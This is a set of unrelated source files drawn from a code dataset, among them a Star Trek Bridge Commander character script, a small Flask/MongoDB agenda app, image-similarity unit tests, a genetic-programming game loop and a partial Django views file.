configuration\n\tpSCPSaffi.SetSize(App.CharacterClass.MEDIUM)\n\tpSCPSaffi.SetGender(App.CharacterClass.FEMALE)\n\tpSCPSaffi.SetRandomAnimationChance(.75)\n\tpSCPSaffi.SetBlinkChance(0.1)\n\tpSCPSaffi.SetDatabase(\"data/TGL/Bridge Crew 
General.tgl\")\n\n\t# Load Saffi's general dialogue lines.\n\tLoadSounds()\n\n\tpSCPSaffi.AdSCPacialImage(\"Blink0\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"Blink1\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"Blink2\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.SetBlinkStages(3)\n\n\tpSCPSaffi.AdSCPacialImage(\"SpeakA\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"SpeakE\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"SpeakU\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.SetAnimatedSpeaking(1)\n\n\tpMenusDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Menus.tgl\")\n\tpTop = App.TopWindow_GetTopWindow()\n\tpTacticalControlWindow = App.TacticalControlWindow_GetTacticalControlWindow()\n\tpSCPSaffi.SetMenu(pTacticalControlWindow.FindMenu(pMenusDatabase.GetString(\"Commander\")))\n\tApp.g_kLocalizationManager.Unload(pMenusDatabase)\n\n#\tdebug(\"Finished creating Saffi\")\n\treturn pSCPSaffi\n\n\n###############################################################################\n#\tConfigureForShip()\n#\n#\tConfigure ourselves for the particular ship object. This involves setting\n#\tup range watchers that tell us how to report.\n#\n#\tArgs:\tpSet\t- the Set object\n#\t\t\tpShip\t- the player's ship (ShipClass object)\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForShip(pSet, pShip):\n\t# Get our character object\n\tpSCPSaffi = App.CharacterClass_Cast(pSet.GetObject(\"XO\"))\n\tif (pSCPSaffi == None):\n#\t\tdebug(\"******* Commanding officer not found *********\")\n\t\treturn\n\n#\tdebug(\"Attaching menu to XO..\")\n\timport Bridge.XOCharacterHandlers\n\tBridge.XOCharacterHandlers.AttachMenuToXO(pSCPSaffi)\n\n\t#\n\t# This is where code to set up responses based on the ships state\n\t# e.g. 
\"Main power back on line\"\n\t#\n\n###############################################################################\n#\tConfigureForGalor()\n#\n#\tConfigure ourselves for the Galor bridge\n#\n#\tArgs:\tpSCPSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForGalor(pSCPSaffi):\n#\tdebug(\"Configuring Saffi for the Galor bridge\")\n\n\t# Clear out any old animations from another configuration\n\tpSCPSaffi.ClearAnimations()\n\n\t# Register animation mappings\n\tpSCPSaffi.AddAnimation(\"SeatedSCPCommander\", \"Bridge.Characters.SCPMediumAnimations.SCPPlaceAtC\")\n\tpSCPSaffi.AddAnimation(\"StandingSCPCommander\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tpSCPSaffi.AddAnimation(\"EBL1MToEBCommander\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromL1ToC\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderToL1\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromCToL1\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderToC1\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromCToC1\")\n\tpSCPSaffi.AddAnimation(\"EBCommander1ToC\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromC1ToC\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderTurnCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPTurnAtCTowardsCaptain\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBackCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPTurnBackAtCFromCaptain\")\n\n\tpSCPSaffi.AddAnimation(\"SCPCommanderGlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderGlanceAwayCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1GlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1GlanceAwayCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnE\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkE\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackE\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnH\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkH\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackH\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnT\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkT\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackT\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnS\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkS\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackS\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurSCP\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkE\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackX\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\n\t# Breathing\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBreathe\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1Breathe\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1BreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\n\t# Interaction\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\", App.CharacterClass.SITTING_ONLY, 25, 
1)\n\tpSCPSaffi.AddAnimation(\"PushingButtons\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\n\t# Hit animations\n\t#pSCPSaffi.AddAnimation(\"SCPCommanderHit\", \"Bridge.Characters.SCPMediumAnimations.SCPCHit\")\n\t#pSCPSaffi.AddAnimation(\"SCPCommanderHitHard\", \"Bridge.Characters.SCPMediumAnimations.SCPCHitHard\")\n\t#pSCPSaffi.AddAnimation(\"EBCommanderHitStanding\", \"Bridge.Characters.CommonAnimations.HitStanding\")\n\t#pSCPSaffi.AddAnimation(\"EBCommanderHitHardStanding\", \"Bridge.Characters.CommonAnimations.HitHardStanding\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderReactLeft\", \"Bridge.Characters.CommonAnimations.ReactLeft\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderReactRight\", \"Bridge.Characters.CommonAnimations.ReactRight\")\n\n\t# Add common animations.\n\tAddCommonAnimations(pSCPSaffi)\n\tpSCPSaffi.SetStanding(0)\n\tpSCPSaffi.SetLocation(\"SCPCommander\")\n\tpSCPSaffi.AddPositionZoom(\"SCPCommander\", 0.4)\n#\tdebug(\"Finished configuring Saffi\")\n\n###############################################################################\n#\tAddCommonAnimations()\n#\n#\tSince we can only clear out all animations when switching bridges (how\n#\twould we know which not to clear?), we can't really setup animations common\n#\tto all bridge configurations as we might like. Because of this we have a\n#\troutine to add common animations (most of which are randoms) that both\n#\tconfigurations will call\n#\n#\tArgs:\tpSCPSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef AddCommonAnimations(pSCPSaffi):\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.SCPMediumAnimations.CLookAroundConsoleDown\", App.CharacterClass.SITTING_ONLY, 1, 1)\n\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadLeft\")\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadRight\")\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookLeft\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookRight\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookUp\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookDown\", App.CharacterClass.SITTING_ONLY)\n\n###############################################################################\n#\tLoadSounds\n#\t\n#\tLoad any of Saffi's general or spontaneous sounds, so they don't\n#\thitch the game when they're played.\n#\t\n#\tArgs:\tNone\n#\t\n#\tReturn:\tNone\n###############################################################################\ndef LoadSounds():\n\tpGame = App.Game_GetCurrentGame()\n\tpDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Crew General.tgl\")\n\t\n\t#\n\t# Build a list of sound to load\n\t#\n\tlSoundList =\t[\n\t\t# Yes?\n\t\t\"gf001\",\n\t\t\"gf002\",\n\n\t\t# Report.\n\t\t\"gf020\",\n\n\t\t# Alert lines.\n\t\t\"GreenAlert\",\n\t\t\"GreenAlert2\",\n\t\t\"GreenAlert3\",\n\t\t\"YellowAlert\",\n\t\t\"YellowAlert3\",\n\t\t\"YellowAlert2\",\n\t\t\"RedAlert\",\n\t\t\"RedAlert2\",\n\n\t\t# Contacting starfleet.\n\t\t\"gl004\",\n\t\t\"gl005\",\n\t\t\t\t\t]\n\t#\n\t# Loop through that list, loading each sound in the \"BridgeGeneric\" group\n\t#\n\tfor sLine in lSoundList:\n\t\tpGame.LoadDatabaseSoundInGroup(pDatabase, sLine, 
\"BridgeGeneric\")\n\n\tApp.g_kLocalizationManager.Unload(pDatabase)\n","sub_path":"scripts/Bridge/Characters/SCPSaffi.py","file_name":"SCPSaffi.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536052598","text":"# *Projet Data-Engineering E4 \r\n\r\nfrom flask import Flask, render_template, redirect\r\nfrom pymongo import MongoClient\r\nfrom classes import *\r\n\r\n# Configuration du systeme\r\napp = Flask(__name__)\r\napp.config.update(dict(SECRET_KEY='maclesecrete'))\r\nclient = MongoClient('localhost:27017')\r\ndb = client.TaskManager\r\n\r\nif db.settings.find({'name': 'task_id'}).count() <= 0:\r\n print(\"Tache non trouvee...\")\r\n db.settings.insert_one({'name':'task_id', 'value':0})\r\n\r\ndef modifID(value): # fonction permettant de donner un ID à chaque évenement de manière croissante\r\n task_id = db.settings.find_one()['value']\r\n task_id += value\r\n db.settings.update_one(\r\n {'name':'task_id'},\r\n {'$set':\r\n {'value':task_id}\r\n })\r\n\r\ndef rdvCreate(form): #fonction permettant la création d'un nouvel évenement\r\n date = form.date.data\r\n heure = form.heure.data\r\n description = form.description.data\r\n task_id = db.settings.find_one()['value']\r\n \r\n task = {'id':task_id, 'date':date, 'description':description, 'heure':heure}\r\n\r\n db.tasks.insert_one(task)\r\n modifID(1)\r\n return redirect('/')\r\n\r\ndef rdvSupprimer1(form): # fonction permettant de supprimer n'importe quel évenement en introduisant son ID\r\n id = form.id.data\r\n if(id):\r\n print(id, type(id))\r\n db.tasks.delete_many({'id':int(id)})\r\n\r\n return redirect('/')\r\n\r\ndef rdvModifier(form): # fonction permettant de modifier la description d'un évenement en introduisant son ID\r\n id = form.id.data\r\n description = form.description.data\r\n \r\n db.tasks.update_one(\r\n {\"id\": int(id)},\r\n {\"$set\":\r\n {\"description\": description}\r\n }\r\n )\r\n\r\n return redirect('/')\r\n\r\ndef reinit_tache(form): # reinitialisation de la liste des évenements de l'agenda\r\n db.tasks.drop()\r\n db.settings.drop()\r\n db.settings.insert_one({'name':'task_id', 'value':0})\r\n return redirect('/')\r\n\r\n@app.route('/', methods=['GET','POST'])\r\ndef main():\r\n # Création de chaque bloc d'évenements'\r\n cform = RdvCreate(prefix='cform')\r\n dform = RdvSupprimer(prefix='dform')\r\n uform = RdvModifier(prefix='uform')\r\n reinit = Reinit(prefix='reinit')\r\n\r\n # Réponses de chaque requête\r\n if cform.validate_on_submit() and cform.creer.data:\r\n return rdvCreate(cform)\r\n if dform.validate_on_submit() and dform.supprimer.data:\r\n return rdvSupprimer1(dform)\r\n if uform.validate_on_submit() and uform.modifier.data:\r\n return rdvModifier(uform)\r\n if reinit.validate_on_submit() and reinit.reinit.data:\r\n return reinit_tache(reinit)\r\n\r\n # Lecture de toutes les données\r\n docs = db.tasks.find()\r\n data = []\r\n for i in docs:\r\n data.append(i)\r\n\r\n return render_template('home.html', cform = cform, dform = dform, uform = uform, \\\r\n data = data, reinit = reinit) # on retourne les données de chaques évenements\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"369300476","text":"'''\n@note:\n This script tests various methods from the mail run.py script \n to ensure proper output 
and image comparison\n'''\n\nimport unittest\nfrom skimage.measure import compare_ssim as ssim\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\nimport sys\nimport os\nimport types\nfrom scipy.stats import wasserstein_distance\nfrom PIL import Image\nfrom abc import ABCMeta, abstractmethod\nfrom algorithm import *\nfrom run import *\n\nlocate = \"./test_image_folder/\"\nentries = os.listdir(locate)\n# select a simulation and a non related galaxy\nimage1 = entries[0]\nimage2 = entries[1]\n\n# load the images, resize and convert to grayscale\nimage1 = cv.imread(locate + image1)\nimage1 = cv.resize(image1, (1000, 1000))\nimage1 = cv.cvtColor(image1, cv.COLOR_BGR2GRAY)\n\nimage2 = cv.imread(locate + image2)\nimage2 = cv.resize(image2, (1000, 1000))\nimage2 = cv.cvtColor(image2, cv.COLOR_BGR2GRAY)\n\nimageA = image1\nimageB = image1\nimageC = image2\n\n\nclass TestRunAndAlgorithmScriptMethods(unittest.TestCase):\n '''\n @note: \n class which runs unit tests on all methods that start with 'test'\n @yields:\n the results of the tests\n '''\n\n LOCATION = \"\"\n \n def test_PercentDifference(self):\n \n '''\n @note: \n tests the Percent Difference algorithm\n @yields:\n the percent difference between images, the smaller the percent\n the more similar the images are to each other with 0 being\n a result of identical images. \n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n imageA = entries[0]\n imageB = entries[0]\n imageC = entries[2]\n\n difference = Context(PercentDifference())\n difference_equal = difference.calculate(locate+imageA, locate+imageB)\n difference_not_equal = difference.calculate(locate+imageA, locate+imageC)\n \n self.assertEqual(difference_equal, 0)\n self.assertNotEqual(difference_not_equal, 0)\n\n def test_EarthMovers(self):\n '''\n @note: \n tests the Earth Mover's algorithm\n @yields:\n a value which represents the amount of work needed\n to transform one image into the other, the smaller the\n returned value the more similar the images are \n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n emd = Context(EarthMovers())\n emd_equal = emd.calculate(imageA, imageB)\n emd_not_equal = emd.calculate(imageA, imageC)\n\n self.assertEqual(emd_equal, 0)\n self.assertNotEqual(emd_not_equal, 0)\n\n def test_Ssim(self):\n '''\n @note: \n tests the Structural Similarity (SSIM) algorithm\n @yields:\n a value which represents how structurally similar two\n images are, the closer the returned value is to 1.0\n the more similar the images are \n \n Here we assert two things:\n 1. if identical images return a value of 1.0\n 2. if different images return a value not equal 1.0\n '''\n\n ssim = Context(Ssim())\n ssim_equal = ssim.calculate(imageA, imageB)\n ssim_not_equal = ssim.calculate(imageA, imageC)\n\n self.assertEqual(ssim_equal, 1.0)\n self.assertNotEqual(ssim_not_equal, 1.0)\n\n def test_Mse(self):\n '''\n @note: \n tests the Mean Squared Error algorithm\n @yields:\n a value which represents the amount of difference present\n between two images. The higher the return the higher the\n difference between images where 0 indicates identical \n images\n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. 
if different images return a value not equal 0\n '''\n\n mse = Context(Mse())\n mse_equal = mse.calculate(imageA, imageB)\n mse_not_equal = mse.calculate(imageA, imageC)\n\n self.assertEqual(mse_equal, 0)\n self.assertNotEqual(mse_not_equal, 0)\n \n def test_test_system_match(self):\n '''\n @note: \n tests the method which tests various images and applies\n the various algorithms described above. More specifically,\n we are seeing if the system returns a match when it should\n @yields:\n a tally of total matches, total differences, total comparisons,\n and total wrong choices done by the system\n \n Here we assert four things if there is a match then:\n 1. total matches should equal 1\n 2. total differences should equal 0\n 3. total comparisons should equal 1\n 4. total wrong should equal 0\n '''\n\n values = [4000, 0.1, 0.004, 30]\n #location = \"./test_image_folder/\"\n results = test_system(\"test01_sim_m31\", \"M31(2)\", values, True, False, locate)\n\n total_matches = results[0][0]\n total_different = results[0][1]\n total_comparisons = results[0][2]\n total_wrong = results[0][3]\n\n self.assertEqual(total_matches, 1)\n self.assertEqual(total_different, 0)\n self.assertEqual(total_comparisons, 1)\n self.assertEqual(total_wrong, 0)\n\n def test_test_system_mismatch(self):\n '''\n @note: \n tests the method which tests various images and applies\n the various algorithms described above. More specifically,\n we are seeing if the system returns a mismatch when it should\n @yields:\n a tally of total matches, total differences, total comparisons,\n and total wrong choices done by the system\n\n important to note that the system resumes where the previous\n method left off and as such the base values for match, difference,\n comparisons, and wrong are 1,0,1,0 not 0,0,0,0\n \n Here we assert four things if there is a mismatch then:\n 1. total matches should equal 1\n 2. total differences should equal 1\n 3. total comparisons should equal 2\n 4. 
total wrong should equal 0\n '''\n \n values = [4000, 0.1, 0.004, 30]\n #location = sys.argv[2]\n results = test_system(\"test01_sim_m31\", \"M81\", values, True, False, locate)\n\n total_matches = results[0][0]\n total_different = results[0][1]\n total_comparisons = results[0][2]\n total_wrong = results[0][3]\n\n self.assertEqual(total_matches, 1)\n self.assertEqual(total_different, 1)\n self.assertEqual(total_comparisons, 2)\n self.assertEqual(total_wrong, 0)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487139769","text":"import numpy as np\n\nfrom matplotlib import pyplot as plt\n\nimport snc.simulation.plot.plotting_utils\nfrom snc.environments import examples\nfrom snc.agents.hedgehog.hh_agents.big_step_hedgehog_agent import BigStepHedgehogAgent\nimport snc.simulation.snc_simulator as ps\nimport snc.simulation.plot.plotting_handlers as hand\nimport snc.simulation.store_data.reporter as rep\nimport snc.simulation.utils.load_agents as load_agents\n\n\ndef build_default_simple_reentrant_line_simulator(seed):\n \"\"\"\n Helper function that returns a simulator to be used by the tests below.\n \"\"\"\n\n env = examples.simple_reentrant_line_model(job_gen_seed=seed)\n overrides = {}\n ac_params, wk_params, si_params, po_params, hh_params, si_class, dp_params, name \\\n = load_agents.get_hedgehog_hyperparams(**overrides)\n\n # Create Policy Simulator\n discount_factor = 0.95\n agent = BigStepHedgehogAgent(env, discount_factor, wk_params, hh_params, ac_params, si_params,\n po_params, si_class, dp_params, name)\n return ps.SncSimulator(env, agent, discount_factor=discount_factor)\n\n\ndef test_live_plotting_to_existing_axes():\n \"\"\"Test live plotting works on existing axes.\"\"\"\n\n seed = 42\n np.random.seed(seed)\n num_simulation_steps = 30\n time_interval = 1\n plot_frequency = 10\n\n hedgehog_simulator = build_default_simple_reentrant_line_simulator(seed)\n\n fig = plt.figure(figsize=(6, 6))\n ax1 = fig.add_subplot(111)\n\n handlers = [hand.StateCostPlotter(num_simulation_steps, time_interval, plot_frequency,\n ax=ax1, testing_mode=True)]\n reporter = rep.Reporter(handlers=handlers)\n\n # Run Simulation\n with snc.simulation.plot.plotting_utils.non_gui_matplotlib():\n hedgehog_simulator.run(num_simulation_steps, reporter=reporter)\n\n for h in handlers:\n assert h.data_cache.shape[1] == num_simulation_steps\n assert not np.all(h.data_cache == np.zeros_like(h.data_cache))\n\n\ndef test_multiple_handlers():\n \"\"\"Test live plotting works with multiple handlers \"\"\"\n\n seed = 42\n np.random.seed(seed)\n num_simulation_steps = 30\n time_interval = 1\n plot_frequency = 10\n\n hedgehog_simulator = build_default_simple_reentrant_line_simulator(seed)\n\n handlers = [\n hand.StateCostPlotter(num_simulation_steps, time_interval, plot_frequency,\n testing_mode=True),\n hand.WorkloadPlotter(num_simulation_steps, time_interval, plot_frequency, testing_mode=True)\n ]\n\n reporter = rep.Reporter(handlers=handlers)\n\n # Run Simulation\n with snc.simulation.plot.plotting_utils.non_gui_matplotlib():\n hedgehog_simulator.run(num_simulation_steps, reporter=reporter)\n\n for h in handlers:\n assert h.data_cache.shape[1] == num_simulation_steps\n assert not np.all(h.data_cache == 
np.zeros_like(h.data_cache))\n","sub_path":"tests/snc/simulation/plot/test_live_plotting.py","file_name":"test_live_plotting.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54238395","text":"from math import *\nnum = int(input(\"Insira um numero: \"))\npi = 12**(1/2)\nnmd = 1\nden1 = 1\nden2 = 3\nden2exp = 0\ncount = 0\nsinal = 1\nresult = 0.0\n\nwhile (count < num):\n\tresult = result + (sinal*(nmd/(den1*(den2**den2exp))))\n\tsinal = sinal *(-1)\n\tden1 = den1 + 2\n\tden2exp = den2exp + 1\n\tcount = count + 1\n\n\npi = pi * result\nprint(round(pi,8))\n\n\n","sub_path":"exs/1199-1141.py","file_name":"1199-1141.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114572492","text":"from gpb import *\nimport findthebox as ftb\nimport random\n# Defining Node Functions\n\n# movement Functions\ndef upF(l):\n\tcurrentLevel.player.moveY(currentLevel, -1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nup = fwrapper(upF, 1, 'Up')\n\n\ndef downF(l):\n\tcurrentLevel.player.moveY(currentLevel, 1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\ndown = fwrapper(downF, 1, 'down')\n\n\ndef leftF(l):\n\tcurrentLevel.player.moveX(currentLevel, -1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nleft = fwrapper(leftF, 1, 'left')\n\n\ndef rightF(l):\n\tcurrentLevel.player.moveX(currentLevel, 1)\n\tif currentLevel.win is False:\n\t\tcurrentLevel.playermoves += 1\n\treturn l[0]\nright = fwrapper(rightF, 1, 'right')\n\n# logic Functions\ndef iffunc(l):\n\tif l[0] > 0:\n\t\treturn l[1]\n\telse:\n\t\treturn l[2]\nifw = fwrapper(iffunc, 3, 'if')\n\n\ndef andfunc(l):\n\tpass\n\n\ndef forloop(l):\n\tpass\n\n\ndef isgreater(l):\n\tif l[0] > l[1]:\n\t\treturn 1\n\telse:\n\t\treturn 0\ngtw = fwrapper(isgreater, 2, 'isgreater')\n\nflist = [up, down, left, right]\n# removed: ifw, gtw\n\n\ndef scoreFunction(tree, levelSet):\n\tscores = []\n\tfor level in levelSet:\n\t\tcurrentLevel = level\n\t\ttree.evaluate()\n\t\tif currentLevel.win is True:\n\t\t\tscores.append(currentLevel.playermoves)\n\treturn (len(scores), (sum(scores)/len(scores))) # number of wins, avg moves\n\n\ndef createLevelset(n, height, width, obstructionN):\n\tlevels = []\n\tfor x in range(0, n):\n\t\tL = ftb.level()\n\t\tlevels.append(L)\n\tfor L in levels:\n\t\tL.generateRandom(height, width, obstructionN)\n\treturn levels\n\nlevelSet = createLevelset(10, 10, 10, 20)\nfor L in levelSet:\n\tL.display()\n\ntree = makerandomtree(2, flist)\nprint(tree.display())","sub_path":"Gameloop.py","file_name":"Gameloop.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633334188","text":"# Bats2.py \n# Rewrite bat names\n# Lindsay Williams \n# Feb 12, 2020\n\n# import modules\n# Add varaibles\n# Ask for input\n# Calculate population estimation\n# print results\n\nspecies1_input = raw_input(\"What is the name of species 1? \" )\n##NAME = (\"Myotis austroriparius\")\n##print(species1_input)\nspecies2_input = raw_input(\"What is the name of species 2? \" )\n##print(species2_input)\n##NAME2 = (\"Myotis septentrionalis\")\nspecies3_input = raw_input(\"What is the name of species 3? 
\" )\n##NAME3 = {\"Eptesicus fuscus\"}\n##print(species3_input)\n\nspecies_1 = str.upper(species1_input)\nspecies_2 = str.upper(species2_input) \nspecies_3 = str.upper(species3_input) \n\n\nstring1 = species_1[0:3] + species_1[7:10] + \" \\n\" \nstring2 = species_2[0:3] + species_2[7:10] + \" \\n\" \nstring3 = species_3[0:3] + species_3[10:13] + \" \\n\" \n\nnew_statement = \"There are three species of bats: \" + \"\\n\" + string1 + string2 + string3\nprint(new_statement) \n","sub_path":"Bats.py","file_name":"Bats.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365022313","text":"\n\n#calss header\nclass _BACKYARD():\n\tdef __init__(self,): \n\t\tself.name = \"BACKYARD\"\n\t\tself.definitions = [u'a small space surrounded by walls at the back of a house, usually with a hard surface: ', u'a space at the back of a house, usually surrounded by a fence, and covered with grass: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_backyard.py","file_name":"_backyard.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9828101","text":"from TitikPoetryApp.models import Recruit, Tula, ProjectSigya, Comments\nfrom django.shortcuts import render, redirect\nfrom .forms import TulaForm\ndef Page(request):\n\treturn render(request, 'Steps.html')\ndef SecondPage(request):\n\tjenjie=Recruit.objects.create(\n\t\tname = request.POST['name'],\n\t\temail = request.POST['email'],\n\t\tgender = request.POST['gender'],\n\t\tbirthday = request.POST['birthday']\n\t\t)\n\treturn redirect('Poetry')\t\n\treturn render(request, 'Steps.html')\n\n\ndef Poetry(request):\n\treturn render(request, 'Titikpoetry.html')\ndef TitikPoetry(request):\n\trufino=Tula.objects.create(\n\t\ttitle_tula = request.POST['name'],\n\t\ttext = request.POST['Tula'],\n\t\tvideo_file = request.FILES['video'],\n\t\t)\n\treturn redirect('Sigya')\n\treturn render(request, 'Titikpoetry.html')\n\ndef Sigya(request):\n\treturn render(request, 'Titiksigya.html')\n\ndef TitikSigya(request):\n\tredem=ProjectSigya.objects.create(\n\t\tbook_donation = request.FILES['picture'],\n\t\tmessagebox = request.POST['texts'],\n\t\tinteger = request.POST['nums'],\n\t\tdate1 = request.POST['dates'],\n\t\t)\n\treturn redirect('TitikEnterprise')\n\treturn render(request, 'Titiksigya.html')\n\ndef TitikEnterprise(request):\n\treturn render(request, 'TitikEnterprise.html')\ndef TitikEnterprise(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 'lawrence':lawrence}\n\treturn render(request, 'Titikenterprise.html', context)\n\ndef Titikvideo(request):\n\treturn render(request, 'Titikvideo.html')\ndef Titikvideo(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 'lawrence':lawrence}\n\treturn render(request, 'Titikvideo.html', context)\ndef Titikpoetry2(request):\n\treturn render(request, 'Titikpoetry2.html')\ndef Titikpoetry2(request):\n\tjenjie=Recruit.objects.all()\n\tredem=Tula.objects.all()\n\tlawrence=ProjectSigya.objects.all()\n\tcontext ={'jenjie':jenjie,'redem':redem, 
